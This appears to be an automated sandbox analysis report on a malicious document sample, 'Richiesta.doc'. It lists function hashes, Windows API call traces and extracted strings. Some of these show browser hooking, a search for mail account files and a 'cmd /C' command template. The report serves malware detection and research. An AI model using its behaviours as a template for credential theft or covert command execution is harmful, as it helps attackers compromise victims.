  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 68439

General

Root Process Name:d3d8sext.exe
Process MD5:AD22F7E25E6FCCF900B5060D4C5E9532
Total matches:141
Initial Analysis Report:Open
Initial sample Analysis ID:68439
Initial sample SHA 256:78E57715D0C6C12E90E96D82B3FF839B78C421F5EFF663AAB6D19DA5B6D82200
Initial sample name:Richiesta.doc

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
